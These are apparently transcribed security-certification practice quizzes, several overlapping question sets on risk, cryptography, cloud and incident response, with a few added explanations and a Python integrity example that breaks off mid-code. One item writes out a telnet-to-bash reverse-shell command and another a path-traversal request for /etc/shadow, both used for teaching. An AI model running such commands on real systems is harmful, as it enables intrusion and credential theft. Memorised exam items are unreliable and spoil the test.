Full Transcript

1. A security analyst has been tasked with assessing a new API. The analyst needs to be able to test for a variety of different inputs, both malicious and benign, in order to close any vulnerabilities. Which of the following should the analyst use to achieve this goal?
   A. Fuzz testing
   B. Static analysis
   C. Input validation
   D. Post-exploitation

2. In order to authenticate employees who call in remotely, a company's help desk staff must be able to view partial information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees?
   A. Metadata
   B. Encryption in transit
   C. Data scrubbing
   D. Field masking

3. The IT team suggests that the company would save money by using self-signed certificates, but the security team indicates the company must use digitally signed 3rd party certificates. Which of the following is a valid reason to pursue the security team's recommendation?
   A. There is minimal benefit in using a CRL
   B. There is more control in using a local certificate over a 3rd party certificate
   C. PKCS#10 is still preferred over PKCS#12
   D. Private-key CSR signage prevents on-path interception

4. A SaaS startup is maturing its DevSecOps program and needs to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with the remediation. The startup began its early testing efforts with DAST to cover public facing application components and recently implemented a bug bounty program. Which of the following will best accomplish the company's objectives?
   A. CMS
   B. WAF
   C. SAST
   D. RASP
   https://www.synopsys.com/blogs/software-security/sast-iast-dast-rasp-differences.html

5. Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition, Company A is requiring the following:
   - Before the merger is complete, users from both companies should be using a single set of usernames and passwords
   - Users in the same departments should have the same set of rights and permissions, but they should have different sets of rights and permissions if they have different IPs
   - Users from Company B should be able to access Company A's available resources
   Which of the following are the best solutions? (Select TWO)
   A. Updating login scripts
   B. Implementing attribute-based access control
   C. Installing Company A's Kerberos systems in Company B's network
   D. Enabling MFA
   E. Establishing one-way trust from Company B to Company A
   F. Installing new GPO policies

6. A security architect is tasked with securing a new cloud videoconferencing and collaboration platform to support a new distributed workforce. The security architect's key objectives are:
   - Maintain customer trust
   - Ensure non-repudiation
   - Minimize data leakage
   Of the following, which would be the best set of recommendations from the security architect?
   A. Enable watermarking, enable user auth requirement, disable video recording
   B. Enable end to end encryption, disable video recording, disable file exchange
   C. Enable the user auth requirement, enable end to end encryption, enable waiting rooms
   D. Disable file exchange, enable watermarking, enable user auth requirement

7. A security admin needs to implement a security solution that will:
   - Improve performance with less congestion on network traffic
   - Limit attack surface in case of an incident
   - Improve access control for external and internal network security
   Which of the following should the security admin do?
   A. Integrate threat feeds into the FIM
   B. Configure the SIEM dashboards to provide alerts and visualization
   C. Deploy DLP rules based on updated PII formatting
   D. Update FW rules to match any new IP addresses in use

8.
A security team created tickets to track the progress of remediations. Which of the following will specify the due dates for high- and critical-priority findings?
   A. MOU
   B. MSA
   C. SLA
   D. ISA

9. An organization's existing infrastructure includes site to site VPNs between data centers. Over the past year, a sophisticated attacker exploited a zero day on the VPN concentrator. In response, the CISO is making infrastructure changes to mitigate the risk of service loss should another zero day exploit be used against the VPN solution. Which of the following designs would be best for the CISO to use?
   A. Using Base64 encoding within the existing site to site VPN connections
   B. Implementing IDS services with each VPN concentrator
   C. Transitioning to a container-based architecture for site based services
   D. Adding a 2nd redundant layer of alternate vendor VPN concentrators
   E. Distributing security resources across VPN sites

10. When implementing serverless computing, an organization must still account for:
   A. the underlying computing network infrastructure
   B. hardware compatibility
   C. the security of its data
   D. patching the service

11. The CEO of an online retailer notices a sudden drop in their sales. A security analyst at the retailer detects a redirection of unsecure web traffic to a competitor's site. Which of the following would best prevent this type of attack?
   A. Configuring certificate pinning
   B. Enforcing DNSSEC
   C. Deploying certificate stapling
   D. Enabling HSTS

12. Which of the following will provide the best solution for organizations that want to securely back up the MFA seeds for their employees in a central, offline location with minimal management overhead?
   A. HSM
   B. Encrypted database
   C. Key escrow service
   D. Secrets management

13. A security engineer is accessing a legacy server and needs to determine if FTP is running and on which port. The service cannot be turned off, as it would impact critical applications' ability to function. Which command will provide the info necessary to create a FW rule to prevent that service from being exploited?
   A. netstat -tulpn
   B. service ftpd status
   C. service --status-all | grep ftpd
   D. chkconfig --list
   E. systemctl list-unit-file --type service ftpd
   -t : Display TCP connections.
   -u : Display UDP connections.
   -l : Display listening sockets (services).
   -p : Display the process associated with the service.
   -n : Display numerical addresses instead of resolving hostnames.

14. A SOC analyst gets an alert about a potential compromise and reviews the following SIEM logs:
   1:15:02PM JMyers successful login on laptop 318
   1:15:45PM JMyers launched outlook.exe on laptop318
   1:17:03PM Process outlook.exe launch cmd.exe on laptop318
   1:17:04PM Process cmd.exe launched rdp.exe on laptop318
   1:17:04PM Process cmd.exe launched rdp.exe on laptop318
   1:17:05PM JMyers successful login on server112
   1:17:05PM JMyers successful login on server113
   1:17:07PM JMyers launched cmd.exe on server112
   1:17:07PM JMyers launched cmd.exe on server113
   Which of the following is the most appropriate action for the analyst to recommend?
   A. Alerting JMyers about the potential account compromise
   B. Isolating laptop318 from the network
   C. Creating NIPS and HIPS rules to prevent logins
   D. Disabling account JMyers to prevent further lateral movement

15. What is record level encryption commonly used to do?
   A. Encrypt individual packets
   B. Protect individual files
   C. Encrypt the master boot record
   D. Protect database fields

16. A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic. When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the OT network?
   A. Multiple solicited responses over time
   B.
   The application of an unsupported encryption algorithm
   C. Packets that are the wrong size or length
   D. The use of any non-DNP3 communication on a DNP3 port

17. A security engineer is creating a single CSR for the following web hostnames:
   www.int.internal
   www.company.com
   home.internal
   www.internal
   Which would meet the requirement?
   A. CN
   B. CA
   C. Issuer
   D. SAN
   E. CRL

18. The principal security analyst for a global manufacturer is investigating a security incident related to abnormal behavior in the UCS network. A controller was restarted as part of the troubleshooting process, and the following issue was identified when the controller was restarted:
   SECURE BOOT FAILED: FIRMWARE MISMATCH EXPECTED 0xFDC479 ACTUAL 0x79F31B
   During the investigation, this modified firmware version was identified on several other controllers at the site. The official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK framework for ICS includes this technique?
   A. Persistence
   B. Evasion
   C. Lateral movement
   D. Collection

19. Which of the following is a risk associated with SDN?
   A. Expanded attack surface
   B. Increased hardware management costs
   C. Reduced visibility of scaling capabilities
   D. New firmware vulnerabilities

20. A forensics investigator is analyzing an executable file extracted from storage media that was submitted for evidence. The investigator must use a tool that can identify whether the executable has indicators which may point to the creator of the file. Which of the following should the investigator use while preserving evidence integrity?
   A. ldd
   B. bcrypt
   C. ssdeep
   D. dcfldd
   E. SHA-3

21. A security architect is implementing a SOAR solution in an organization's cloud production environment to support detection capabilities. Which of the following will be the most likely benefit?
   A. Increased risk availability
   B. Optimized cloud resource utilization
   C. Improved security operations center performance
   D. Automated FW log collection tasks

22. A systems engineer needs to develop a solution that uses digital certificates to allow authentication to laptops. Which of the following authenticator types would be most appropriate for the engineer to include in the design?
   A. TOTP token
   B. Device certificate
   C. Biometric
   D. Smart card

23. An organization's board of directors has asked the CISO to build a 3rd party management program. Which of the following best explains a reason for this request?
   A. Risk management
   B. Risk transference
   C. Supply chain visibility
   D. Support availability

24. An organization has an operational management with a specific equipment vendor. The organization is located in the US, but the vendor is located in another region. Which of the following risks would be most concerning to the organization in the event of equipment failure?
   A. Support may not be available during all business hours
   B. Each region has different regulatory frameworks to follow
   C. The organization requires authorized vendor specialists
   D. Shipping delays could cost the organization money

25. The general counsel at an organization has received written notice of upcoming litigation. The general counsel has issued a legal record hold. Which of the following actions should the organization take to comply with the request?
   A. Request that all users do not delete any files
   B. Require employees to be trained on legal record holds
   C. Block communication with the customer while litigation is ongoing
   D. Preserve all communications matching the requested search terms


1. A security engineer is concerned about the threat of side-channel attacks. The company experienced a past attack that degraded parts of a SCADA system, causing a fluctuation to 20,000 rpms from its normal operating range.
   This caused the part to deteriorate more quickly than the mean time to failure. A further investigation revealed the attacker was able to determine the acceptable rpm range, and the malware would then fluctuate the rpm until the part failed. Which of the following solutions would be best to prevent a side-channel attack in the future?
   A. Implementing a HIDS
   B. Installing online hardware sensors
   C. Air gapping important ICS and machines
   D. Installing a SIEM agent on the endpoint

2. Which of the following is the most important cloud specific risk from the CSP's viewpoint?
   A. CI/CD deployment failure
   B. Management plane breach
   C. Insecure data deletion
   D. Resource exhaustion

3. A mobile admin is reviewing the following mobile device DHCP logs to ensure the proper mobile settings are applied to managed devices:
   10, 10/18/2021, 17:01:05, Assign, 192.168.1.10, UserA-MobileDevice, 0236FB12CA0B
   23, 10/19/2021, 07:11:19, Assign, 192.168.1.23, UserA-MobileDevice, 068ADIFAB109
   10, 10/20/2021, 19:22:56, Assign, 192.168.1.96, UserA-MobileDevice, 0ABC65E81AB0
   10, 10/21/2021, 22:34:15, Assign, 192.168.1.33, UserA-MobileDevice, BAC034EF9451
   10, 10/22/2021, 11:55:41, Assign, 192.168.1.12, UserA-MobileDevice, 0E938663221B
   Which of the following mobile configuration settings is the mobile admin verifying?
   A. Wireless network auto joining
   B. 802.1X with mutual authentication
   C. Service set identifier authentication
   D. Association MAC address randomization

4. Which of the following technologies would benefit the most from the use of biometric readers, proximity badge entry systems, and the use of hardware security tokens to access various environments and data entry systems?
   A. Machine learning
   B. Deep learning
   C. Nanotechnology
   D. Biometric impersonation
   E. Passwordless authentication

5. A security manager has written an incident response playbook for insider attacks and is ready to begin testing it. Which of the following should the manager conduct to test the playbook?
   A. Centralized logging, data analytics, and visualization
   B. Threat emulation
   C. Threat hunting
   D. Automated vulnerability scanning

6. A security admin wants to detect a potential forged sender claim in the envelope of an email. Which of the following should the security admin implement? (Select TWO)
   A. TLS
   B. SPF
   C. DMARC
   D. MX record
   E. S/MIME
   F. DNSSEC

7. A pentester inputs the following command:
   telnet 192.168.99.254 343 | /bin/bash | telnet 192.168.99.254 344
   This command will allow the pentester to establish a:
   A. network pivot
   B. proxy chain
   C. reverse shell
   D. port mirror

8. A government agency's cyber analyst is concerned about how PII is protected. A supervisor indicates that a Privacy Impact Assessment must be done. Which of the following describes a function of a Privacy Impact Assessment?
   A. To document residual risks
   B. To identify the network ports
   C. To evaluate threat acceptance
   D. To validate the project participants

9. An IoT device implements an encryption module within its SoC, where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware. Which of the following should the IoT manufacturer do if the private key is compromised?
   A. Replace the public portion of the IoT key on its servers
   B. Release a patch for the SoC software
   C. Manufacture a new IoT device with a redesigned SoC
   D. Use over the air updates to replace the private key

10. A small bank is evaluating different methods to address and resolve the following requirements:
   - Must maintain confidentiality if one piece of the layer is compromised
   - Must be able to store credit card data using the smallest amount of data possible
   - Must be compliant with PCI-DSS
   Which of the following is the best solution for the bank?
   A. Masking
   B. Scrubbing
   C. Tokenization
   D. Homomorphic encryption

11.
A network admin managing a Linux web server notices the following traffic:
   http://comptia.org/../../../../etc/shadow
   Which of the following is the best action for the network admin to take to defend against this type of attack?
   A. Validate that MFA is enabled on the server for all user accounts
   B. Validate that the server is not deployed with default account credentials
   C. Validate the server certificate and trust chain
   D. Validate the server input and append the input to the base directory path

12. A security engineer needs to select the architecture for a cloud database that will protect an organization's sensitive data. The engineer has a choice between a single tenant or a multitenant database architecture offered by a cloud vendor. Which of the following best describes the security benefit of the single-tenant option? (Select TWO)
   A. Increased geographic diversity
   B. Full control and ability to customize
   C. High degree of privacy
   D. Most cost-effective
   E. Low resilience to side-channel attacks
   F. Ease of backup and restoration

13. An employee's device was missing for 96 hours before being reported. The employee called the help desk for another device. Which of the following phases of the incident response cycle needs improvement?
   A. Resolution
   B. Investigation
   C. Containment
   D. Preparation

14. An internal security audit determines that Telnet is currently being used within the environment to manage network switches. Which of the following tools should be utilized to identify credentials in plaintext that are used to log in to these devices?
   A. Fuzzer
   B. HTTP interceptor
   C. Port scanner
   D. Password cracker
   E. Network traffic analyzer

15. A company is acquiring a competitor, and the board has asked the CIO to perform due diligence activities on the competitor prior to acquisition. A recent compliance audit of the competitor environment shows no critical findings and exemplary policy and processes. Since the competitor has an audited environment, the CIO's recommendation to the board is to move forward with existing security capabilities and write additional security controls to manage the additional risks. Which of the following risk management strategies is the CIO recommending?
   A. Mitigate and accept
   B. Reduce and mitigate
   C. Transfer and accept
   D. Mitigate and transfer

16. After connecting to a company's newly built production website (https://www.company.com) using a browser, a systems admin reviewed the following output:
   /var/www/html/index.html
   /var/www/html/image01.png
   /var/www/html/server.crt
   /var/www/html/server.gif
   /var/www/html/server.key
   /var/www/html/test.cgi
   /var/www/html/test-form.php
   /var/www/html/user-db-connect.php
   /var/www/html/user-auth.php
   Which of the following should the admin do next? (Select TWO)
   A. Implement a WAF in front of the web server
   B. Disable the directory listing
   C. Configure the server to load index.html by default
   D. Scan PHP and CGI files for secure coding
   E. Update user-db-connect.php with the appropriate credentials
   F. Request an update to the CRL

17. An organization needs to classify its systems and data in accordance with external requirements. Which of the following roles is best qualified to perform this task?
   A. Data owner
   B. Data processor
   C. Data custodian
   D. Systems admin
   E. Data steward

18. In a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the following is the most cost-effective risk response?
   A. Risk transfer
   B. Risk mitigation
   C. Risk acceptance
   D. Risk avoidance

19. After the latest risk assessment, the CISO decides to meet with the development and security teams to find a way to reduce the security task workload.
   The CISO would like to:
   - Have a solution that uses an API to communicate with other security tools
   - Use the latest technology possible
   - Have the highest controls possible on the solution
   Which of the following is the best option to meet these requirements?
   A. CSP
   B. CASB
   C. SOAR
   D. EDR

20. An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization's new email system provide?
   A. DLP
   B. Encryption
   C. E-discovery
   D. Privacy-level agreements

21. An organization recently completed a security controls assessment. The results highlighted the following vulnerabilities:
   - Out of date definitions
   - Misconfigured operating systems
   - An inability to detect active attacks
   - Unimpeded access to critical servers' USB ports
   Which of the following will most likely reduce the risks that were identified by the assessment team?
   A. Implement a vulnerability management program and a SIEM tool with alerting, install a badge system with zones, restrict privileged access
   B. Install EDR on endpoints, configure group policy, lock server room doors, install a camera system with guards watching 24/7
   C. Create an information security program that addresses user training, perform weekly audits of user workstations, utilize a centralized configuration management program
   D. Update antivirus definitions, install NGFW with logging enabled, use USB port lockers, run SCAP scans weekly

22. A company has retained the services of a consultant to perform a security assessment. As part of the assessment, the consultant recommends engaging with others in the industry to collaborate in regards to emerging attacks. Which of the following would best enable this activity?
   A. ISAC
   B. OSINT
   C. CVSS
   D. Threat modeling

23. The CISO asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company's data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored. Which of the following would meet these requirements?
   A. Bluetooth
   B. Geofencing
   C. NFC
   D. SMS

24. A security officer is requiring all personnel working on a special project to obtain a security clearance requisite with the level of all information being accessed. Data on this network must be protected at the same level of each clearance holder. The need to know must be verified by the data owner. Which of the following should the security officer do to meet these requirements?
   A. Create a rule to authorize personnel only from certain IPs to access the files
   B. Assign labels to the files and require formal access authorization
   C. Assign attributes to each file and allow authorized users to share the files
   D. Assign roles to users and authorize access to files based on the roles

25. A company recently deployed a SIEM and began importing logs from a fw, file server, domain controller, web server, and a laptop. A security analyst receives a series of SIEM alerts and prepares to respond. The following is the alert information:
   Severity   Source Device   Event Info                                              Time (UTC)
   Medium     abc-usa-fw01    RDP (3389) traffic from abc-admin-lp01 to abc-usa-fs1   10:20:08
   Low        abc-ger-dc1     Successful logon event for user rsmith on abc-usa-fs1   10:20:34
   Medium     abc-ger-fw01    RDP (3389) traffic from abc-usa-fs1 to abc-ger-fs1      10:21:02
   Low        abc-usa-fw01    SMB (445) traffic from abc-usa-fs1 to abc-web01         10:20:21
   Low        abc-usa-dc1     Successful logon event for user rsmith on abc-ger-fs1   10:24:55
   High       abc-usa-fw01    FTP (21) traffic from abc-ger-fs01 to abc-web01         10:25:16
   High       abc-web01       Successful logon event for user Administrator           11:26:40
   Which of the following should the security analyst do first?
   A. Shutdown abc-usa-fw01; the remote access VPN vulnerability is exploited
   B. Disable rsmith account; it is likely compromised
   C.
   Shutdown the abc-usa-fs1 server; a plaintext credential is being used
   D. Disable Administrator on abc-usa-fs1; the local account is compromised


1. To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within its proprietary software. Which of the following should the company consider to maximize risk reduction from vulnerabilities introduced by OpenSSL?
   A. Compile 3rd party libraries into the main code statically instead of using dynamic loading
   B. Include stable, long term releases of 3rd party libraries instead of using newer versions
   C. Ensure the 3rd party library implements TLS and disable weak ciphers
   D. Implement an ongoing, 3rd party software and library review and regression testing

2. A security team performed an external attack surface analysis and discovered the following issues on a group of application servers:
   - The majority of the systems have end of life operating systems
   - The latest patches that are available are over two years old
   - The systems are considered mission critical for client support
   - The proprietary software running on the systems is not compatible with newer versions of the operating system
   - Server outages would negatively affect quarterly revenue projections
   Which of the following would allow the security team to immediately mitigate the risks inherent to this situation?
   A. Isolate the servers from the internet and configure an internal ACL, only allowing access to authorized employees
   B. Document the application servers as being end of life and define a target date for decommission
   C. Contact the vendor for the proprietary software and negotiate a new maintenance contract
   D. Implement a WAF between the application servers and the external perimeter

3. A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization. Which of the following should be the analyst's first action?
   A. Determine which security compliance standards should be followed
   B. Perform a full system penetration test to determine the vulnerabilities
   C. Ascertain the impact of an attack on the availability of crucial resources
   D. Create a full inventory of information and data assets

4. Company A acquired Company B. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a fw between the two environments until Company B's infrastructure could be integrated into Company A's security program. Which of the following risk handling techniques was used?
   A. Avoid
   B. Accept
   C. Transfer
   D. Mitigate

5. A company wants to refactor a monolithic application to take advantage of cloud native services and service microsegmentation to secure sensitive application components. Which of the following should the company implement to ensure the architecture is portable?
   A. Virtualized emulators
   B. Orchestration
   C. Type 2 hypervisor
   D. Containerization

6. A hospital has fallen behind with patching known vulnerabilities due to concerns that patches may cause disruptions in the availability of data and impact patient care. The hospital does not have a tracking solution in place to audit whether systems have been updated or to track the length of time between notification of the weakness and patch completion. Since tracking is not in place, the hospital lacks accountability with regard to who is responsible for these activities and the timeline of patching efforts. Which of the following should the hospital do first to mitigate this risk?
   A. Ensure CVEs are current
   B. Complete a vulnerability analysis
   C. Purchase a ticketing system for auditing efforts
   D. Obtain guidance from the health ISAC
   E. Train admins on why patching is important

7. Some end users of an e-commerce website are reporting a delay when browsing pages.
   The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing traffic via Wireshark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect recommend?
   A. Adding more nodes to the web server clusters
   B. Changing the cipher algorithm used on the web server
   C. Implementing OCSP stapling on the server
   D. Upgrading to TLS 1.3

8. A CSO is concerned about the number of successful ransomware attacks that have hit the company. The data indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants to evaluate whether the training has been successful. Which of the following should the CSO implement?
   A. Performing a risk assessment
   B. Conducting a sanctioned vishing attack
   C. Simulating a spam campaign
   D. Executing a pen test

9. As part of a policy and procedure review, a data privacy officer is working with system owners to identify appropriate assignments for personnel to perform access management activities based on the input provided by system owners. Which of the following describes the personnel who will receive input from system owners?
   A. Data subjects
   B. Authoritative sources
   C. Systems admins
   D. Regulators
   E. Custodians

10. During a network defense engagement, a red team is able to edit the following registry key:
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
   Which of the following tools is the red team using to perform this action?
   A. Fuzzer
   B. Network vulnerability scanner
   C. SCAP scanner
   D. PowerShell

11. A DevOps engineer submits a VM for hardening verification as part of a new IaaS deployment. The DevOps engineer attests that:
   - The device has all production software installed
   - All services are running on their default ports
   - All security policies have been applied through GPOs
   - All unnecessary software has been removed
   The submitting engineer provided the following information:
   Server type: MS SQL
   Management interface: RDP
   Windows file sharing required: Yes
   A compliance engineer performs an unauthenticated network vulnerability scan as part of hardening verification. The vulnerability scanner has fw access to the device, and its source IP has been added to the allow list in the device's endpoint protection software. No known vulnerabilities have been identified. The scan identified the following ports:
   Port   Status
   445    Open
   22     Open
   3389   Open
   135    Open
   139    Open
   Company policy states that a system that has no known vulnerabilities and has been confirmed to have all production software installed will meet hardening requirements and will be approved for production. Which of the following actions should the compliance engineer take, based on the server configuration and the results of the vulnerability scan? (Select THREE)
   A. Reject the server
   B. Have the user verify that MS SQL is installed properly
   C. Recommend uninstalling PostgreSQL
   D. Recommend closing the service on port 22
   E. Approve the server
   F. Recommend closing the service on port 3389
   G. Recommend removing Flash Player
   H. Recommend closing the service on port 445

12. A developer wants to maintain the integrity of each module of a program and ensure controls are in place to detect unauthorized code modification. Which of the following would be best for the developer to perform? (Select TWO)
   A. Verify MD5 hashes
   B. Encrypt with 3DES
   C. Utilize code signing by a trusted 3rd party
   D. Compress the program with a password
   E. Implement certificate based authentication
   F. Make the DACL read-only

13.
A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred first? A. Clone the disk B. Collect the most volatile C. Copy the relevant log files D. Preserve secure storage Points: 0/1 14. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic. Which of the following would satisfy the requirement? A. NIDS B. NIPS C. WAF D. Reverse proxy Points: 0/1 15. A multinational organization was hacked, and the IRTs timely action prevented a major disaster. Following the event, the team created an after action report. Which of the following is the primary goal of an after action review? A. To identify ways to improve the response process B. To create a plan of action and milestones C. To determine the identity of the attacker D. To gather evidence for subsequent legal action Points: 0/1 16. A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems. Some of the requirements are: Handle an increase in customer demand of resources Provide quick and easy access to information Provide high quality streaming media Create a user friendly interface Which of the following actions should be taken first? A. Deploy high availability web servers B. Enhance network access controls C. Implement a content delivery network D. Migrate to a virtualized environment Points: 0/1 17. A security architect is analyzing an old application that is not covered for maintenance anymore because the software compamy is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks? A. 
A. Source code escrows
B. Software audits
C. Code review
D. Supply chain visibility

18. A common industrial protocol has the following characteristics:
- Provides no authentication or security
- Is often implemented in a client/server relationship
- Is implemented as either RTU or TCP/IP
Which of the following is being described?
A. Profinet
B. Zigbee
C. Modbus
D. Z-Wave

19. A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead and be resistant to offline password attacks. Which of the following should the security consultant recommend?
A. WPA2-PSK
B. WPA2-Enterprise
C. WPA3-Personal
D. WPA3-Enterprise

20. An organization established an agreement with a partner company for specialized help desk services. A senior security officer within the organization is tasked with providing the documentation required to set up a dedicated VPN between the two entities. Which of the following should be required?
A. MOU
B. SLA
C. NDA
D. ISA

1. An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization's new email system provide?
A. DLP
B. Encryption
C. E-discovery
D. Privacy-level agreements

2. Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Select TWO)
A. RDP
B. MDM
C. Tunneling
D. VDI
E. Proxy
F. MAC randomization
3. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. Post-remediation work, the assessment recorded the following:
- There will be a $20k per day revenue loss for each day the system is delayed going into production
- The inherent risk was high
- The residual risk is low
- The solution rollout to the contact center will be a staged deployment
Which of the following risk handling techniques will best meet the organization's requirements post remediation?
A. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service
B. Accept the risk, as compensating controls have been implemented to manage the risk
C. Apply for a security exception, as the risk is too high to accept
D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider

4. In a shared responsibility model for PaaS, which of the following is the customer's responsibility?
A. OS security
B. Physical security
C. Host infrastructure
D. Network security

5. An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the least amount of downtime. Which of the following should the analyst perform?
A. Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics.
B. Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the metrics.
C. Implement every solution one at a time in a virtual lab, running metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best solution based on the metrics.
D. Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the metrics.

6. A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?
A. Data lake
B. Machine learning
C. Asynchronous keys
D. Homomorphic encryption

7. A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data. Which of the following algorithms, when combined into a cipher suite, will meet the requirements? (Select THREE)
A. RC4
B. ECDSA
C. GCM
D. DH
E. RSA
F. EDE
G. CBC
H. AES
Forward secrecy and AEAD come from different parts of a cipher suite. Forward secrecy requires an ephemeral key exchange: with DH in its ephemeral form (DHE, or ECDHE over elliptic curves) each session key is derived from one-time values, so a later compromise of the server's long-term private key does not expose recorded sessions. Static RSA key transport provides no forward secrecy; in an ephemeral suite RSA or ECDSA is used only to sign the handshake and authenticate the server. AEAD comes from the record-protection mode: AES in GCM mode encrypts and authenticates the ciphertext and the associated data in one operation, whereas CBC needs a separate MAC, and RC4 and 3DES (EDE) are deprecated. In OpenSSL notation such a suite reads, for example, ECDHE-ECDSA-AES128-GCM-SHA256.

8. A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field.
Which of the following should the security team recommend first?
A. Working with procurement and creating a requirements document to select a new IAM system/vendor
B. Updating the identity management system to use discretionary access control
C. Investigating a potential threat identified in logs related to the identity management system
D. Beginning research on two-factor authentication to later introduce into the identity management system

9. Which of the following processes involves searching for and collecting evidence during an investigation or lawsuit?
A. E-discovery
B. Review analytics
C. Chain of custody
D. Information governance

10. A security analyst has been tasked with providing key information in the risk register. Which of the following outputs or results would be used to best provide the information needed to determine the security posture for a risk decision? (Select TWO)
A. Network traffic analyzer
B. Password cracker
C. Protocol analyzer
D. Vulnerability scanner
E. SCAP scanner
F. Port scanner

11. An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication?
A. Public keys on both endpoints
B. Shared secret for both endpoints
C. Perfect forward secrecy on both endpoints
D. A common public key on each endpoint
E. A common private key on each endpoint

12. A small data center experienced a ransomware attack, and 10 TB of data was encrypted. The data is now unavailable. The attacker was able to convince a guard at the data center entrance that the necessary access card had been left inside the building. The guard allowed the individual to enter the building, and the attacker was able to leave an infected pen drive. The CISO is now considering controls to prevent such events from recurring in the future. Which of the following describes this phase in the CISO's response process?
A. Recovery
B. Identification
C. Analysis
D. Detection

13. A security architect is analyzing an old application that is no longer covered for maintenance because the software company is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks?
A. Supply chain visibility
B. Source code escrows
C. Software audits
D. Code review

14. A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will best meet this requirement?
A. Enable fast recovery on the storage account
B. Make the blob immutable
C. Implement soft delete for the blobs
D. Mirror the blobs at a local data center
Blob soft delete protects an individual blob, snapshot, or version from accidental deletes or overwrites by maintaining the deleted data in the system for a specified period of time. During the retention period, you can restore a soft-deleted object to its state at the time it was deleted. After the retention period has expired, the object is permanently deleted. Soft delete only helps here if the retention period is longer than the interval between backups, so that a blob deleted early is still recoverable when the backup runs. https://learn.microsoft.com/en-us/azure/storage/blobs/soft-delete-blob-overview

15. A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All server and desktop computers are scanned by a dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the best option for the security team to ensure worker laptops are scanned before being granted access to the corporate network?
A. Implement network access control to perform host validation of installed patches
B. Create a vulnerability scanning subnet for remote workers to connect to on the network at HQ
C. Install a vulnerability scanning agent on each remote laptop to submit scan data
D. Create an 802.1X implementation with certificate-based device identification

16. When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belong to the client?
A. Data
B. Physical security
C. Network
D. Storage

17. A cloud engineer is tasked with improving the responsiveness and security of a company's cloud-based web application. The company is concerned that international users will experience increased latency. Which of the following is the best technology to mitigate this concern?
A. Containerization
B. Caching
C. Clustering
D. Content delivery network

18. Which of the following is the most important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?
A. Assuring the integrity of messages
B. Improving the availability of messages
C. Enforcing protocol conformance for messages
D. Ensuring non-repudiation of messages

19. A developer wants to maintain the integrity of each module of a program and ensure controls are in place to detect unauthorized code modification. Which of the following would be best for the developer to perform? (Select TWO)
A. Utilize code signing by a trusted 3rd party
B. Compress the program with a password
C. Encrypt with 3DES
D. Verify MD5 hashes
E. Make the DACL read-only
F. Implement certificate-based authentication
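Question 19 above (and question 12 of the previous set, which is the same question) asks how to detect unauthorized modification of program modules. The following added example, which is not code from the quiz page, contrasts a bare hash manifest with a signed one: an attacker who can rewrite a module can also rewrite a hash list stored beside it, but cannot forge a signature without the signer's key. It assumes an HMAC-SHA256 key held only by the release pipeline as a stand-in for a real code-signing certificate issued by a trusted third party, and it uses constructed in-memory modules rather than files on disk.

```python
"""Module-integrity check: bare hash manifest vs. signed manifest.

Added example for the code-signing question above, not code from the quiz
page. Assumption: a real code-signing scheme uses an asymmetric signature
under a certificate chained to a trusted third party; HMAC-SHA256 stands in
for that signature so the example runs with only the standard library. The
"modules" are constructed in-memory byte strings, not real files.
"""
import hashlib
import hmac
import json

# Constructed sample program: module name -> module bytes.
MODULES = {
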